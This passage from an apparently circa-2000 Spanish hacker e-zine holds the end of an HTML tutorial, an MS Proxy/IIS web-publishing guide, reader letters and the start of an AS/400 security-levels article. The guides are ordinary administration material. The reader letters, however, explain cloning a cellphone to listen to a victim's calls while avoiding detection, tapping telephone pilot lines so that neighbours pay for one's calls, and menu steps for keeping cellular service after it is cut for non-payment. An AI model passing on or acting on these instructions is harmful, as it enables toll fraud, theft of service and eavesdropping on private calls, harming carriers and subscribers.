ancho de la imagen en pixeles, y HEIGHT el alto.
No intenten colocar una imagen .bmp, ya que no las abrira, sino que les
saldra el cuadro de dialogo preguntando si quieren bajar el archivo.
Un link!! un link!! ok ustedes piden un link, y les dare un link, Agreguen el
siguiente comando en su pagina, y tendran uno:
Pagina de seguridad informatica
Si quieren colocar un archivo para que sus amigos lo bajen, el siguiente
comando les sirve:
Archivo con fotos
Su correo:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Otros comandos:
: Tira una linea horizontal.
: Coloca un punto *
: Tabulacion
Eso no mas por hoy, en la proxima version seguiremos analizando el
fabuloso mundo de la programacion en HTML Jua Jua Jua!.
Finalmente el codigo completo:
BIENVENIDO A MI PRIMERA PAGINA
HOLA YO SOY JUAN PEREZ ESTA ES MI PAGINA WESH ...
*****************************************************************************
7) DESPEDIDA.
*****************************************************************************
Esto no se acaba se~ores!!! espero volver en un tiempo mas con otros
codigos fuentes. Mi correo es
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
, para quejas burlas,
puteadas, etc.
Mis agradecimientos a Proyecto_R por este espacio, y ademas de abrirme
los ojos ( solo los ojos ) en el sentido informatico.
Grande LINUX !!!!
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 10. Publicacion Web Segura con Ms Proxy ::--..
By Plaxius
Saludos terricolas, esta vez he querido hablar de crear una solucion segura
de publicar nuestros sitios web basados en plataforma NT. Ya hemos hablado
en el articulo anterior (PR 8) como asegurar un servidor Windows NT, pero
ahora trataremos de publicar varios sitios con una sola direccion IP y sin
necesidad de tener estos sitios directamente al Internet.
Ms Proxy nuestro aliado (en esta ocasion). Bueno este software de M$ sirve
para dar salida a una red completa a traves de una sola direccion IP
(alguien dijo Squid .. si Ipchains tambien), pero de Ms Proxy ya escribio un
articulo mi amigo TAkER.
Bueno IIS 4.0 permite tener varios sitios en un solo servidor con una sola
direccion IP, esto gracias a la posiblidad de filtrar los encabezados del
protocolo http. Es decir tu asocias la misma direccion IP a todos tus web
sites pero en las propiedades avanzadas les das el header que corresponde
a cada sitio. Ejemplo.
Mi maquina
|
+ Default FTP Site
|
+ Default Web Site
|
+ misitio
|
+ otrositio
En las propiedades de cada sitio pondremos la direccion IP mas el
header correspondiente por ejemplo para la configuracion anterior seria
algo parecido a esto.
1.- Editar propiedades del sitio (boton derecho sobre el sitio)
2.- Dentro de las pestana "Web Site" sale lo siguiente
Description _____________
Ip Address _____________ Advance
Port _____________
En decripcion saldra el nombre del sitio , en ip address existe un
boton flecha que al pincharlo aparece las direcciones IP que estan
disponibles en el server.
El port por defecto es el 80, pero puedes cambiarlo si lo necesitas
(recuerda que el puerto 80 es el defecto para http).
Hacemos un click en el boton advance.
3.- Nos aparecera un menu con los siguientes valores
IpAddress TCP Port Host Header Name
192.xx.xx.xx 80
____________________________
| Add | Remove | Edit |
----------------------------
4.- Al dar un clik en Edit podras poner el Host Header Name al cual
pondremos a modo de ejemplo www.misitio.com, al dar aceptar quedara algo
parecido a lo siguiente.
IpAddress TCP Port Host Header Name
192.xx.xx.xx 80 www.misitio.com
____________________________
| Add | Remove | Edit |
----------------------------
5.- Luego deberiamos repetir el proceso para los demas sitios.
Bueno para mas detalles de como hacer este procedimiento, revisa el
excelente texto escrito por nuestro amigo CoDeX sobre IIS 4.0 .
http://www.undersec.com/staff/codex/zip/iis40.zip
Esta configuracion funciona perfectamente pero presenta algunas falencias
de seguridad, si entran al sitio por alguna u otra razon, ya no solo estara
en peligro un sitio, sino que todos los sitios que tengas en el servidor,
ademas que sucederia si quieres montar varios sitios con acceso a bases de
datos, con configuraciones especiales; tendrias a una cantidad de carga
en el servidor que terminaria por colapsar el sistema. Que pasa si trabajas
en una empresa que se dedica a hacer sitios webs, o quieres publicar paginas
personales para toda la gente de tu departamento de Informatica (tendrias
un monton de gente pidiendote el servidor para cambiar una web o alguna
base de datos).
Para esto utilizaremos el web publishsing de M$ Proxy.
veamos la configuracion de la red para este efecto.
Internet $$$$$$$$$$$ Red Interna Ip No validas
______________$ M$ $_____________________________________
$ Proxy $ | | |
$$$$$$$$$$$ """""""" """""""" """"""""
$ WK1 $ $ WK2 $ $ WK3 $
"""""""" """""""" """"""""
Como vemos en el esquema tenemos el M$ Proxy conectado a Internet y tenemos
las WK 1,2,3 conectadas a la red Interna con direcciones Ip internas. Estas
WKs publican paginas webs que se pueden accesar internamente a traves de los
path UNC ( http:\wk1\ ). Estos WKs pueden ser servidores NT con IIS o Pc's
con Win95 y Personal Web Server (no lo he probado con Linux pero deberia
funcionar perfectamente). Tonces es posible publicar las webs de las WKs
en internet a traves del servidor proxy, esto puede ser a traves de
subdominios o de nuevos dominios en Internet.
¨Que necesitamos para hacer esto?
Windows NT
IIS 4.0
MS Proxy 2.0 service pack 1
Es necesario que la version de Ms proxy ser la misma que la del SO. Es decir
si tienes Windows NT Ingles utilices Ms Proxy en Ingles, es una regla que
se debiera seguir en todas las aplicaciones para no tener problemas.
¨Como hacerlo?
Dentro del Internet Service Manager existe la siguiente estructura
Mi maquina
|
+ Default FTP Site
|
+ Sock Proxy
|
+ Default Web Site
|
+ Web Proxy ----------------> este servicio utilizaremos
|
+ Winsock Proxy
Damos un click con el boton derecho del mouse a "Web Proxy" y hacemos click
en Properties. Se nos abrira la ventana de properties y seleccionamos la
pesta~a superior que dice "Publishing", hay un cuadro que dice "enable web
publiching" que deberemos seleccionar apareciendo una pantalla como la
siguiente.
X Enable Web Publishing
By default, incoming web server request should be:
_ Discarded
X Sent to the local web server
_ Sent to another web server ____________ Port: _____
Except for those listed below:
Request Path: ||Router to:
______________________________________________________________________
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
|______________________________________________________________________|
________________________________________________________
||Default Mapping || Add || Edit || Delete ||
________________________________________________________
Hasta ahora cualquier peticion web a la direccion IP correspondiente al
servidor Proxy enviara como respuesta la web por defecto del servidor.
Si ponemos hacemos click en Add nos aparecera la siguiente ventana
Mapping
Send Web Server Request for
Path: http://www.sitio.com
----------------------
To this URL: http://makinainterna/misitio
-------------------------------
___________________________
| Ok || Cancel || Help |
---------------------------
Lo que acabamos de decirle a este cuadro es que cuando se requiera el
sitio llamado "http://www.sitio.com" el servidor proxy publique el
sitio ubicado en la makina interna llamada "makinainterna" directorio
web "misitio".
Al dar Ok deberia quedar lo siguiente.
X Enable Web Publishing
By default, incoming web server request should be:
_ Discarded
X Sent to the local web server
_ Sent to another web server ____________ Port: _____
Except for those listed below:
Request Path: ||Router to:
______________________________________________________________________
| |
|http://www.misitio.com http://makinainterna/misitio |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
|______________________________________________________________________|
________________________________________________________
||Default Mapping || Add || Edit || Delete ||
________________________________________________________
De esta forma podemos seguir creando nuevos sitios utilizando el web
publishing.
Espero que este texto sirva a alguien y que le saquen el mejor provecho
posible.
Se despide
PlaXiuS
CDLR
Security Team
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 11. 3 1/2 (O lo que alguna vez quizo pero no pudo) ::--..
By Varios
Buenas, buenas... com pueden ver, tenemos una nueva seccion, se trata de nada
mas y nada menos de los mails que nos llegan, que por estar poco trabajados,
o por no tener suficiente de que hablar no llegan a ser articulos...
Igual, son temas interesantes, y se que con un poco mas de trabajo podrian
llegar a ser textos muy interesantes, pero por ahora... no pueden.
Pero, venga, la informacion que expresan aqui no tiene nada que ver con el
pensamiento de CDLR, ni ha sido verificada, ni nada de eso, son solo textos
que me parecieron interesantes, y si alguien los quiere verificar, que lo
haga y me cuente.
Ustedes sabran mas yo que como como han de juzgarlos...
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
EL BAUL DE LOS RECUERDOS
~~~~~~~~~~~~~~~~~~~~~~~~
por CHack
No hace mucho platicaba con un buen amigo de CDLR, sobre las peliculas que se
habian realizado sobre Hackers y las emociones encontradas que nos
provocaban, a los que hemos estado algun tiempo en el mundo de lo
subterraneo.
Cuantos de nosotros, no hemos visto cuando menos unas cuarenta y siete veces
Matrix o hemos hasta cambiado de nick depues de haber visto la pelicula
Hackers.
Pero ahora, ya casi nadie recuerda esa vieja pelicula de hackers en la que
en ningun momento se menciono esa palabra; esa pelicula donde el protagonista
no firmaba con algun nick impactante, aun despues de entrar al sistema de
reservaciones de una linea aerea.
Que tiempos aquellos "Se~or don Simon", donde las computadoras caseras eran
maquinas lectoras de discos flexibles de 8 pulgadas; o si eran de las
modernas, podias contar con discos de 5 1/4, y si eras rico, en un momento
dado hasta podias tener un disco duro de 20 MB y que uno pensaba que no lo
llenaria nunca jamas.
Del monitor ni hablar los habia en verde, amarillo, naranja o blanco pero
solo un color a la vez; y lo unico que podia desplegar era texto con el
cursor del tama~o de un cuadro, asi que imaginate como eran los juegos de esa
epoca.
El sonido que traia la computadora era impactante, cuando se podia oir hablar
a la computadora "WOPR" a traves de una bocina de esas que uno hacia en las
lecciones de hagalo ustad mismo de "Mecanica Popular".
Y que decir del aparato ese, en donde se encajaba la bocina del telefono para
transmitir los bip bip de la maquina que armaba uno con partes compradas en
Radio Shack, y utilizar el famosisimo "WarDialer"; claro conectado a traves
de una linea "Phreakeada".
Aun recuerdo como me impresiono el protagonista cuando quiso hacer una
llamada desde un telefono publico y como no tenia dinero utilizo una tapa de
refresco de lata para generar el tono de marcado.
Esa epoca en donde las computadoras, parecian arboles de navidad, lavadoras;
o lo que sea, menos computadoras y que por cierto eran menos inteligentes que
la lavadora que le tengo en mi casa.
Si, era 1983; y terminos como: Guerra Termonuclear Total, base Norad, Rusos
vs. Americanos eran comunes y terminos como: Login, encriptacion, Puerta
Trasera eran muy nuevos.
Los juegos de moda eran Galaga, Jungle Hunt, Tron y Mrs. Pac Man
Aun recuerdo la emocion que me provocaba el que Matthew Broderick entrara al
Sistema de Defensa Americano (como si fuera tan facil) y escuchar a Joshua
decir con voz metalica:
GREETINGS PROFESSOR FALKEN
Si ya supieron que pelicula es quiere decir que:
Tienen mas de 30 anos.
Su Papa les ponia esa pelicula de castigo por no aprender a utilzar el
lenguaje Logo.
La televisora de su localidad la presento despues de un ataque Hacker a su
pagina WEB.
Ya es dificil de conseguir esa pelicula, pero en mi pais todavia existen los
mercados populares donde revenden cosas de 2a. 3a. o hasta 10a. mano, y la
encontre en video aunque en formato Beta.
Casualmente cuando escribia esta nota, tambien encontre a muchos de mis
amigos de esa epoca, ya casi todos tenemos hijos y hasta algunos peinamos
canas; pero seguimos aqui en el mundo de la informatica, con el mismo
espiritu Hacker que tenia el protagonista de la pelicula.
WarGames es una pelicula que guardo de forma muy especial en el baul de mis
recuerdos, y que cada vez que la veo, me hace admirar mas y mas, a esas
mentes curiosas y por sobre todo libres, que no se limitan al mundo que se
les impone vivir.
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
Clonacion de celulares por VinchuKa
Quizas no tenga los conociminetos que tienen muchos de los integrantes de
esta lista pero igualmente voy a escribir este texto ya que cuando busque fue
muy poco lo que consegui y me costo bastante.
Las comunicacones crecen cada vez mas y la seguridad de las mismas sigue
siendo la misma.
Las comunicaciones celulares tienen 2 frecuencias por canal, una que comunica
el celular con la torre y otra que comunica la torre con el celular, a los
primeros se los conoce con el nombre de RECs mientras que a los segundos se
los conoce con el nombre de FOCs.
Bueno, tomando el tema de la colancion de celulares cabe decir que lo que
entendemos por clonar, es decir que el celular que "duplicamos" tenga las
mimas prestaciones que el celular "victima" es sumamente dificil y ahora
vamos a explica por que. El tema es asi, para que nosotros podamos realizar
llamadas telefonicas deberemos cambiar el ESN (electronical serial number)
que es asignado a cada telefono en particular y que se encuentra "encerrado"
en una memoria Eprom y que para modificar se necesitan una serie de
herrmientas especiales que no se encuentran al alcance de cualquiera.
Por esto es que digo que para que lo mas posible es limitarte a escuchar
comunicaciones del celular que has "clonado" ¿Pero como se hace? es bastante
sencillo una vez que conseguis la documentacion del aparato que vas a usar.
Existen dos formas de hacerlo, una es mediante interfaz en la cual deberas
hacerte los famosos cables planos para conectar al puerto de la impresora y
de alli al celular (por lo que tendras que conseguirte una ficha para
conectar al puerto y otra para la conexcion al celular,para ello podras usar
la que usa el cargador del celular del auto), para completar el mecanismo
ademas deberas contar con el software apropiado aunque esto no genera mayores
problemas ya que lo conseguis pidiendolo en astalavista o en new order alli
hay muchisimos.
Este mecanismo hasta el momento no lo use, estoy armando los cables y en
cuanto lo termine lo probare.
Pero vamos a la segunda via que es la mas importante que es la de
programacion mediante el teclado, para cada modelo la programacion resulta
diferente por lo que no te podre dar la formula para ingresar los comandos y
listo, tendras que buscarlos por alguna pagina, lleva tiempo pero hay unos
cuantos lugares que cuentan con manuales de programacion.
Si encontras unos que dicen que el celular no se puede programar mas de tres
veces no le des ni medio de bola, es sanata.
Bueno, el primer paso es entrar al modo de programacion del telefono una vez
entrado al entorno de programacion te va a pedir el numero del celular, aqui
ponele el codigo de area y el numero a "clonar" todo junto, hasta aqui todo
barbaro pero el problema es cuando te pide el ID ( te dice enter sys id), el
id segun el manual de motorola es un "especial nivel del sistema de
programacion" con el que cuenta el telefono celular.
El id lo podes averiguar desde el teclado, por lo que me han dicho (no lo
probe) en los Ericsson es bastante facil de obtener y en el motorola no es
muy distinto, el tema es el siguiente si vos tenes un celular que ha tenido
linea cuando entras al modo de programacion te pide el numero que le queres
asignar si esperas te lo va a pedir dos veces y luego te lo larga solo y lo
mismo con el id es decir que si te pide el id dejalo un rato y lo larga solo
(esto si alguna vez ha tenido linea), el id debe ser de cinco digitos, sino
te da cinco digitos algo mal hiciste.
Nota: traten de no tener el telefono prendido al pedo porque los pueden
enganchar, y si logran hacer "algo" no la boqueen ya que siempre esas cosas
"se escapan", menos aun a una novia (lo digo por experiencia).
Espero haber servido de ayuda y gracias por leer mi primer documento.
La informacion aqui expresada esta basada en practica.
Vinchuka
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
Subject:
Date: Thu, 30 Dec 1999 15:07:09 -0500
From: triniti 1 <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨
""LAS VERDADES Y LAS GRANDES MENTIRAS""
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨
!!SOBRE PHREACK!!
(Por NEO)
Hola en este escrito estoy refiriendo a todos documentos emergentes de
algunos supuestos hackers o lamers , cada cual que le de su categoria.
La verdad es que cuando uno conoce el tema, le sabe bastante mal que este
grupo de paginas en la red ,como pueda ser (ellos ya saben a kien me refiero
"parlanchines del pheack") se las den de grandes controladores de pirateo de
lineas cuando lo que son es grandes ignorantes o mentirosos.
Traductores,, es la palabra que podria definirlos estupendamente, por que
absorben como babosas el contenido del Phreack de E:E:U:U: " !!VOSOTROS SI
QUE SABEIS!!"
Esta gente esta metiendo en problemas a muchos chavales, que estupidos ellos
les hacen caso, no se puede decir lo que es un par piloto si desconoce la
informacion, y si realmente controlan,, como dicen esas mentiras para que
Timofonica les cojan por unos delitos mas fuertes que el de cojerse a un
piloto.,al estar da~ando la intimidad de un "abonado de timo.".
O que tiene de bonito que un vecino del quinto pague tu factura de conectarse
con una BBS de Japon ,timofonica tiene dinero el vecino puede que viva de
una pension y este no es el white phreak que yo aprendi hace tiempo .
De peque~o yo solo intentanva saber el como ,lo primero que aprendi fue no
saber quien me ense~o y lo segundo respetar a las buenas personas y
aprovecharme de las grandes empresas como mi preferida la"TIMO"
Yo se que ahora pensareis,, quien co~o es el inutil que critica a tan
importantes hacks,, lo comprendo y me remitire a los hechos...
1' Un hacker necesita las lineas que este inmaculadas para poder hacer lo que
le venga en gana y sin control mas que los datos que un lammer pueda dejar en
su ordenador pero por la linea nunca te cojeran si sabes realmente.
Es muy gracioso lo bien que podria quedar si empezara a quedarme con los
lectores si contara como funciona en las centrales de conmutacion,, pero Dios
mio para que sirve por favoor!!.
Lo que quieren saber es como no tener problemas ni control telefonica sobre
ti y tu PC.
2' Lo mejor es conectar doden mucha gente se conecta al cabo del dia, estos
son los famosos pares pilotos del que tanto se hablan pero no se acierta ni a
la de tres que estan separados totalmente de los abonados (abajo) que
normalmente esta unas tuercas y si todos los pares estan con tuercas es el
ultimo (par piloto).
3' No todos los pares pilotos funciona (esto depende de el presupuesto que la
"TIMO"emplee en la ciudad) y en otros podrian estar multiplados (o sea que no
solo existe ese mismo piloto en esta caja terminal).
Esto podria dar problemas lo que llaman falta de aislamiento.
Subreparticiones, accesos esto es otra historia amigo mio.
Lo mejor es encontrar un piloto que funcione bien pero multiplado, por que
esto despista a la "TIMO" por que para ellos el circulo se abre mucho, al
poder estar varios sitios .
Poligonos industriales o mis preferidos el campo en postes que tienen cajas a
la altura de la cabeza.
Por hoy ya vale pero no me comais mas la cabeza con la mierda de la box de
muchos colorines, que si blue box, no por favor eso no sirve es para eeuu y
aqui no, bueno hay un truqillo para algunas cosas pero me lo guardo para mi.
))) Tengo conocimiento de ke os tienen muy kontrolados por los numerikos por
los ke conectais, siempre limpios ke no tenga nada ke ver con vosotros(((
Paso de los men in green ,que estan muy cerca y estoy un poco paranoico.
No os podeis imaginar el control y las lecturas y escuchan de los tlf.y mails
joder que mal royo .
NEO ya no esta un abrazo y por favor llevar cuidado con la informacion.
neoneoneoneoneoneoneoneoneoneoneoneoneoneoneoneonoenoenoeneoneoneoneoneoneone
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
os espero en la oscuridad!!
El que me busca me
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Welcome to the real world!!
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
From: "DARIO FRANCISCO PRADO" <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Date: Sat, 22 Apr 2000 19:06:00 GMT
Hola queridos amigos de Proyecto R
guto me da de verlos nuevamente en este espacio, el motivo para escribirles
es simple: Otra falla de Bellsouth hace ya algun tiempo les envie un
truquillo para llamar gratis desde lo celulares con tarjeta ahora va otro...
Cuando uno, por la pobreza que nos caracteriza a estos humildes estudiantes
de cualquier cosa, lo ataca y no tiene dinero ni para comer, menos tendra
para pagar la factura o boleta del celular. Buuuuuuu
pero no importa gracias a el desorden tipico de nuestra compa~ia amiga
Nerdsouth podremos seguir hablando aun cuando nos hayan cortado la red...
celular.
como, simple: cuando nos desabilitan el servicio celular por no pago nos
desabilitan la red digital, pero si recordamos tambien existe la analoga o
sea cambiemonos de red:
Mas facil echarke agua: Modelo Nokia 2160
1)encender celular (si no no funciona)
2)apretar tecla (-)menu e inmediatamente el numero61
3) Generalmente esta en "tipo org B asi que debemos cambiarlo a "alterno A" o
en su defecto"A y B" y luego aceptar (OK) y finalmente salir (salga) aprieta
2 veces gil con eso habremos conseguido cambiar el sistema de red y tendremos
sistema analogo y digital. si no les funciona con "AyB" intentelo con
"alterno A" el asunto tarde o temprano les tendra que resultar.
FALLO PROBADO
BUENO AMIGOS MIOS SI ENCUENTRO ALGO MÁS LES ESCRIBIRE HAAAAA ME ENCUENTRO
INVESTIGANDO LAS FAMOSAS TARJETAS DE PREPAGO DE LA TELEFONICA Y COMO TODO
TIENE UN FALLO ASI QUE EN CUANO TERMINEMOS LAS PRUEBAS LES ENVIARE UN
EMULADOR DE TARJETAS DE PREPAGO O TERJETAS PROM DE 8 PATILLAS
SIN MAYORES ALTERACIONES NI LATAS SE DESPIDE SU HUMILDE APRENDIZ:
DARIO FRANCISCO PRADO
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 12. Niveles de Seguridad en el AS/400 ::--..
By Taker
Bahhh, otro mal**** articulo de lo unico que se escribir, y de lo unico que a
la gente no le gusta leer, pues lo siento... igual, a mi me sirven, uds los
pueden imprimir y luego utilizar en otras tareas mas lucrativas, yo por lo
menos, ahora no tengo nada mas que hacer, son las 4.30 pm, "supuestamente"
estoy trabajando y a las 6.30 tengo un parcial de Calculo Diferencial... asi
que tengo que aclarar mi mente... XDDD.
En un articulo anterior ya habiamos dado un rapido vistazo a los niveles de
seguridad del 400, pues ahora vamos a ver un poco mas a fondo estos niveles y
la forma de complementar los mismos con la seguridad que se le asigna a los
perfiles de usuario, objetos, spools entre otras, para mejorar la seguridad
de nuestros bichos (lease AS/400 XDDD ).
Niveles de Seguridad del Sistema.
Como ya les habia contado, nuestros bichos, son el producto de la integracion
de lo mejor de las dos tecnologias anteriores producidas por IBM, el Sistema
36 (o S/736) y el Sistema 38 (S/38), esta integracion afecto tanto la
arquitectura como la seguridad del sistema. En el S/36, el administrador del
sistema podia elegir entre activar los dispositivos de seguridad o utilizar
unicamente passwd sin asegurar objetos especificos. En los S/38 se
implementaron ambos metodos, es decir, tenian que trabajar juntos. En el
AS/400, la integracion de esos dos metodos se puede seleccionar a gusto del
usuario, mediante los niveles de seguridad, lo cuales van desde el nivel 10,
el cual no tiene seguridad en absoluto, hasta el nivel 50 (que adicional a
los passwd y dispositivos de seguridad, provee una seguridad de integridad
del sistema -- Como por ejemplo, evitar la ejecucion de instrucciones
restringidas a nivel de maquina --).
Entender los niveles de seguridad y escoger el nivel correcto para nuestra
necesidad es el primer paso que hay que tener en cuenta para asegurar nuestro
bicho.
El valor de sistema, QSECURITY es el que controla los niveles de seguridad.
los posibles valores son 10, 20, 30, 40 y 50, que corresponden a los 5
niveles de seguridad en el sistema. Hoy, la gran mayoria de AS/400 traen por
defecto el nivel de seguridad 40, antes venian con el nivel 10.. (me pregunto
por que ese cambio, a caso los admins ya no confian en los usuarios...???).
El nivel de seguridad actual de nuestro sistema se puede visualizar con el
comando DSPSYSVAL, y este se puede cambiar con el comando CHGSYSVAL, luego,
especificar el valor del sistema a cambiar (en esta caso QSECURITY), y en la
linea siguiente especificar el valor deseado.
Nota: lo que esta entre "______" son cuts & paste de mi consola del AS/400.
Ie.
_____________________________________________________________________________
Cambiar valor del sistema (CHGSYSVAL)
Teclee elecciones, pulse Intro.
Valor del sistema . . . . . . . QSECURITY QACGLVL, QACTJOB, QADLACTJ..
Nuevo valor . . . . . . . . . . 50
_____________________________________________________________________________
Y luego presionar Intro.
Tambien se puede hacer de la forma corta, escribiendo el comando completo en
la linea de comandos asi:
CHGSYSVAL SYSVAL(QSECURITY) VALUE('50')
Ahora a lo que vamos...
Nivel de seguridad 10.
"--------------------"
(Nivel lamers Paradise..!!! XDD)
Es el nivel donde menos seguridad se le aplica al sistema, bueno, aqui no se
le aplica ninguna clase de seguridad al sistema, por esto tambien suele ser
llamado nivel de seguridad 0 o "Nivel de segurida Fisica" (uds saben, tener
las consolas en un sitio cerrado y cosas por el estilo). Si un usuario tiene
acceso a una pantalla, el simplemente puede digitar CUALQUIER nombre de
usuario y presionar Intro (no, no es necesario una contrase~a) y podra
acceder tranquilamente al sistema. Si el perfil de usuario tecleado no existe
el sistema lo utilizara para crear un nuevo perfil para la sesion, en este
caso, es sistema crea un perfil de usuario con permisos de *ALLOBJ (como ya
vimos anteriormente este sera como el root en un *nix).
Como cosa extra~a, el administrador del sistema puede cambiar esos permisos
y permitir o negar permisos en los objetos del AS/400, pero no entiendo la
razon de esto, ya que con llegar y typear algun nombre chungo cuyo perfil de
usuario no exista, se creara uno nuevo con todos los permisos... :?
Adicional a esto, el nivel 10 no activa el parametro LMTCPB, lo cual implica
que los usuario no se veran limitados a un menu o programa inicial, ni le son
restringidos los comandos del sistema.. etc.. etc ..etc...
Sera por algo que IBM ya dijo que a partir del V4R2 no va a soportar mas este
nivel. XDDD (It looks like Windows 9x security... XDDD)
Nivel de seguridad 20
"-------------------"
(Same as the last..!!!)
Este nivel de seguridad ya implementa passwd para el acceso al sistema, un
usuario debe typear un usuario VALIDO y un passwd correcto para accesar el
AS/400. Este tambien es un nivel de seguridad minimo, ya que al igual que el
nivel 10, los permisos especiales para cada usuario son de *ALLOBJ.
Tambien, igual que en el nivel 10, estos permisoso especiales pueden ser
cambiados, utilizando el parametro SPCAUT (autorizaciones especiales) al
crear el usuario (comando CRTUSRPRF), o utilizando el comando CHGUSRPRF
(cambiar perfil de usuario). Y tambien se puede activar LMTCPB (*yes) para
restringir al usuario a un programa inicial o menu especifico.
Aunque esas funciones nos permiten manejar a antojo los perfiles de usuario,
la debilidad de este nivel se mantiene, ya que por defecto, la seguridad de
lo recursos no esta implementada. La autorizacion *ALLOBJ que se asigna por
defecto a cada nuevo perfil de usuario del sistema se salta cualquier
seguridad en nuestro bichito. Para implementar seguridad a nivel de recursos
sobre el nivel 20, es necesario remover el permiso *ALLOBJ de cualquier
perfil de usuario que no lo necesite. Entonces, esto hace que nos tengamos
que meter en la cabeza que es necesario remover este permiso especial cada
vez que creamos un nuevo perfil de usuario. Personalmente veo esto sin
sentido ya que si nuestro sistema tuviera (yeahh dream babe) nivel 30, esto
se haria automaticamete ;).
Si nuestro sistema lo estamos corriendo en nivel 10 cambiamos a nivel 20, el
sistema un passwd igual al nombre de usuario a todos los perfiles de usuario
existentes. Lo mejor al hacer este tipo de cambio (de 10 a 20), es borrar
todos los perfiles de usuario existentes ya que estos fueron creados
automaticamente por el sistema incluso si no era necesario (i.e La mamacita
del contabilidad estaba sentada junto al teclado de la consola y por error
presiono las teclas 3 y luego Intro, entonces ahora tenemos un perfil de
usuario llamado 3... Mala cosa...).
Para saber los usuarios del sistema utilizamos el comandoo DSPAUTUSR, esto
nos da como resultado una pantalla con todos los nombres de usuarios
actuales de nuestro sistema asi:
_____________________________________________________________________________
Visualizar Usuarios Autorizados
Ultimo
Perfil Perfil Cambio Sin
Usuario Grupo Contrase~a Contras. Texto
QSYSOPR 28/04/00 Operador del sistema
QTCP 08/04/98 X Perfil Interno de Usuario de TCP
QTFTP 08/04/98 X Perfil de usuario proporcionado
QTMHHTP1 08/04/98 X HTTP SERVER CGI PROFILE
QTMHHTTP 08/04/98 X HTTP SERVER PROFILE
QTMPLPD 08/04/98 X ALLOW REMOTE LPR REQUESTERS
QTMTWSG 08/04/98 X 5250 HTML WORKSTATION GATEWAY PR
QTSTRQS 08/04/98 X Perfil Usuario Peticion Prueba
QUSER 04/04/00 Usuario de Estacion de Trabajo
Mas...
Pulse Intro para continuar.
F3=Salir F12=Cancelar F17=Principio F18=Final
_____________________________________________________________________________
No creo que esta pantalla necesite explicacion... o si.???
Despues de decidir los usuarios que son necesarios, podemos pasar a eliminar
los actuales y crear nuevos, o eliminar simplemente los que no deben estar
alli y los que si se quedan darles los permisos necesarios. Adicional a esto
es importante que los usuarios que quedaron en el sistema cambien sus passwd
inmediatamente despues de creados (ya que por el cambio, estos passwd fueron
cambiados a el mismo nombre de usuario).
Esto se puede hacer asi: Cambiar a password "expired" para cada perfil de
usuario, y luego modificar el valor de sistema de paswword composition.
Lo primero para que la proxima vez que un usuario autorizado ingrese al
sistema, este automaticamente le diga que el passwd ha expirado y necesita
cambiarlo (de lo contrario no lo deja acceder).
Y lo segundo, con el fin de que los usuario no escojan passwd sencillos de
adivinar... (se puede seleccionar la politica de passwd deseada).
Asi, siguiendo estos pasos, podemos hacer una migracion sin mayores
complicaciones a nivel de seguridad 20.
Nivel de seguridad 30
"-------------------"
(just a little more complicated...)
Este nivel de seguridad por defecto soporta seguridad de recursos (no se
asignan permisos *ALLOBJ a los nuevos usuarios). La seguridad de recursos
implica que un usuario no puede acceder a objetos a los cuales no tenga
permisos.
A continuacion se muestra la lista de autorizaciones especiales que asigna el
sistema al crear un nuevo perfil de usuario:
Easy... No hay ninguna clase de autorizaciones para los usuario nuevos..!!!
de todas formas se pueden cambiar segun el gusto del consumidor.
*ALLOBJ es asignado unicamente a los usuarios que tenga perfil de Oficial de
seguridad (*SECOFR). Por defecto, los perfiles de usuario nuevos no tienen
autoridad para crear, modificar o borrar objetos en el sistema. Este tipo de
permisos tienen que ser concedidos por el oficial de seguridad o algun tipo
de administrador que tenga autorizacion en el sistema para hacerlo.
Ya vimos que cambiar de nivel 10 a 20 no es dificil, pero la cosa si se
complica al querer cambiar de uno de estos dos niveles a nivel 30, se
requiere un poco mas de planeacion. Cuando cambiamos de nivel 10 o 20 a nivel
30, el OS/400 (Sistema operativo de los bichos estos) quita cualquier
autorizacion especial que un usuario no debe tener en el nivel 30, es decir
